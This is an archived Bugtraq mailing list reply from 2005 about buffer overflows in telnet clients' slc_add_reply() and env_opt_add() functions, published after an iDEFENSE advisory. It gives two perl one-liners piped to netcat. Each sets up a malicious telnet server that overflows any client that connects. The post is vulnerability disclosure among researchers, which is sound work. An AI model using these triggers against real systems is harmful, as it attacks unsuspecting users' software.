Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Re: iDEFENSE Security Advisory 03.28.05: Multiple Telnet Client slc_add_reply() Buffer Overflow Vulnerability
From: Tavis Ormandy <taviso () gentoo org>
Date: Tue, 29 Mar 2005 01:18:09 +0100
On Tue, Mar 29, 2005 at 01:35:02AM +0400, Solar Designer wrote:

On Mon, Mar 28, 2005 at 01:09:38PM -0500, iDEFENSE Labs wrote:

Multiple Telnet Client slc_add_reply() Buffer Overflow Vulnerability


FWIW, I've been using the following one-liner to trigger this overflow:

perl -e 'print "\377", "\372\42\3\377\377\3\3" x 43, "\377\360"' | nc -l 23



here's one for the env_opt_add() vulnerability:

perl -e 'print "\xff\xfd\x27\xff\xfa\x27\x01\x03","\x01"x"128","A"x"64","\xff\xf0"' | nc -lp 23

-- 
-------------------------------------
taviso () sdf lonestar org | finger me for my gpg key.
-------------------------------------------------------

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]